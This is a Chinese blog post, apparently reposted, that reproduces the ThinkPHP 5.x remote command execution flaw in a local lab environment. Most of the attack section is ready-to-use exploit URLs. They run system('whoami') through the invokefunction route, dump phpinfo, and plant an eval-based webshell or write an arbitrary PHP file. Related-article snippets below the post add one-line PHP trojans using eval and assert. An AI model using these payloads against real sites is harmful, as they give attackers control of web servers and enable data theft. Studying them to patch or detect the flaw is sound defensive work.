php版本%3e=5.6,ThinkPHP5.0版本 远程命令执行漏洞GetShell

最新推荐文章于 2023-09-08 18:09:43 发布
最新推荐文章于 2023-09-08 18:09:43 发布
阅读量236 收藏
点赞数
文章标签: php版本%3e=5.6

https://blog.csdn.net/Fly_hps/article/details/84954664

漏洞概况

ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。

漏洞危害

攻击者可通过该漏洞获取网站的控制权限,可修改页面,导致数据泄漏等问题。

影响版本

5.x < 5.1.31, <= 5.0.23

复现环境

thinkphp5.1   phpstudy集成环境(php5.6n+apache+mysql)

复现过程

1、如图所示首先搭建好环境

a2f38d1f3557a60287ad2bc191435fd4.png

2、利用system函数远程命令执行:

http://localhost/thinkphp5.1/html/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami

991862eac84f4e4739a881cec837cc44.png

3、通过phpinfo函数写出phpinfo()的信息:

http://localhost/thinkphp5.1/html/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

139ad9c4202bb407427268df85d98fac.png

4、写入shell:

http://localhost/thinkphp5.1/html/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

2342542fee4663872fc9ca6aa715dc22.png

或者是:http://localhost/thinkphp5.1/html/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>

内容来源于网络如有侵权请私信删除

海参包
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SCALANCEX414-3E固件更新版本V2.2.0显示
04-01
介绍了关于SCALANCEX414-3E固件更新版本V2.2.0显示的详细说明,提供其它知识的技术资料的下载。
ThinkPHP 5.0 get SHELL
q412539429的博客
02-19 967
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f 路由信息中controller的部分进行了过滤,可知问题出现在路由调度时 关键代码: 在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 1.利用sys...
php一句话木马连接客户端_代码执行函数之一句话木马
weixin_39580042的博客
12-06 1503
前言大家好,我是阿里斯,一名IT行业小白。今天分享的内容是代码执行函数之一句话木马的构造。内容简单实用,没有过多的废话,希望能帮助到大家。函数eval()$a = $_POST['cmd1'];eval($a);assert()assert($_REQUEST['a']); #11年的菜刀可以使用 ,其它版本不行# 参考链接 https://www.freebuf.com/article...
phpinfo包含临时文件Getshell全过程及源码
记录学习,一起进步
03-04 2746
phpinfo包含临时文件Getshell全过程及源码
Thinkphp5~6多语言文件包含到rce漏洞复现and详细分析解析
最新发布
君逍遥o
09-08 854
Thinkphp5~6多语言文件包含到rce漏洞复现and详细分析解析
PHP LFI 利用临时文件 Getshell 姿势
qq_45521281的博客
06-02 2786
文章目录前言PHP LFI临时文件全局变量存储目录命名规则Windows Temporary FilePHPINFO特性测试代码漏洞分析漏洞利用php7 Segment Fault利用条件漏洞分析代码环境漏洞利用 前言 最近整理PHP文件包含漏洞姿势的时候,发现一些比较好用的姿势关于本地文件包含漏洞可以利用临时文件包含恶意代码拿到Webshell的一些奇技淫巧,于是打算详细整理一下。 PHP LFI PHP LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文
金山WPS Mail邮件客户端远程命令执行漏洞(Mozilla系XUL程序利用技巧) _ 乌云漏洞库,乌云镜像站, WooYun
08-03
本文将详细讨论金山WPS Mail邮件客户端中的一个远程命令执行漏洞,该漏洞利用了Mozilla系XUL程序的特定技巧。此问题在2016年被发现并报告,影响了WPS Mail的2.2.2 2016.03.25版本,允许攻击者通过特定手段执行任意...
php中get_headers函数的作用及用法的详细介绍
12-19
成功执行时,`get_headers()`返回一个数组,数组中的每个元素都是服务器响应的一个头部信息。如果请求失败或无法连接到指定URL,函数将返回`FALSE`并发出一个E_WARNING级别的错误信息。 ### 3. 示例 以下是一个...
[HACK学习呀] - 2020-04-26 ThinkCMF缓存Getshell1
08-03
在本文中,我们将深入探讨一个针对ThinkCMF2.X系统的安全漏洞,该漏洞允许攻击者通过缓存机制实现Getshell攻击。Getshell是指攻击者通过某种方式在目标服务器上创建一个可执行PHP脚本,从而获取对服务器的控制权。...
minidlna-1.2.1_dlna移植_discovergza_minidlna移植_minidlna最新版本server_
10-02
dlna dms源码,最新版本,容易移植,c代码
phpinfo为关键的getshell方法
m0_55772907的博客
11-18 1048
get shell
[复现]Thinkphp5系列漏洞
kuuhh的博客
08-05 6834
SQL注入 parseData方法 本次漏洞存在于 Builder 类的 parseData 方法中。由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。漏洞影响版本5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。 测试代码,我这里用的版本ThinkPHP 5.0.15 public function index() { update / insert 方法
ThinkPHP V5漏洞解析及利用)及tornado知识点
qq_62046696的博客
10-03 3529
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本
php getshell漏洞,74cms前台某处Getshell漏洞(SSTI)
weixin_28406969的博客
03-17 488
这是一个服务端模板注入漏洞。Application/Home/Controller/MController.class.phpnamespace Home\Controller;use Common\Controller\FrontendController;class MController extends FrontendController{public function index(){i...
ThinkPHP v5.x命令执行利用工具(可getshell
Fly_鹏程万里
12-13 1万+
漏洞验证 命令执行 getshell 工具下载 https://download.csdn.net/download/fly_hps/10848910 免责声明 该工具只能授权验证网站漏洞和站长验证漏洞使用。 禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关...
thinkphp5.0和5.1的getshell漏洞
爱钓鱼的程序猫
01-28 6087
前几天网站被提权了,网站才建没几天,应该不会有人故意为之,可能是批量扫描getshell的, 为了方便我找的是开源系统thinkcmf建了博客,看着挺不错的,因为thinkcmf用的是thinkphp5.0的框架开发的,我到thinkphp.cn上去看了一下,原来有一个提权漏洞。 libaray/think/app.php文件中模块,控制器,方法使用的是/来区分开来。 然后并没有对控制器进行...
ThinkPHP 5.0 * 远程代码执行漏洞分析
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
ThinkPHP5.0.*版本代码执行漏洞
热门推荐
锋刃科技的博客
01-12 3万+
我们先看处理请求的Request类,在thinkphp/ library/think/Request.php。 Method方法来获取当前的请求类型。 isGet、isPOST、isPUT等方法都调用了method方法来做请求类型的判断。 而在默认情况下,是有表单伪装变量的 在默认情况下,该变量值为_method 在Method方法中,将表单伪装变量对该方法的变量进行...
运行“编辑组策略”导航到本地计算机策略%3E计算机配置%3E管理模板%3E Windows组件%3E远程桌面服务%3E远程桌面会话主机%3E远程会话环境设置“使用WDDM图形显示驱动程序…”到“禁用” 具体如何操作
05-22
2. 在左侧导航栏中展开“计算机配置”→“管理模板”→“Windows 组件”→“远程桌面服务”→“远程桌面会话主机”→“远程会话环境设置”; 3. 在右侧窗口中找到“使用 WDDM 图形显示驱动程序进行远程会话”选项,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值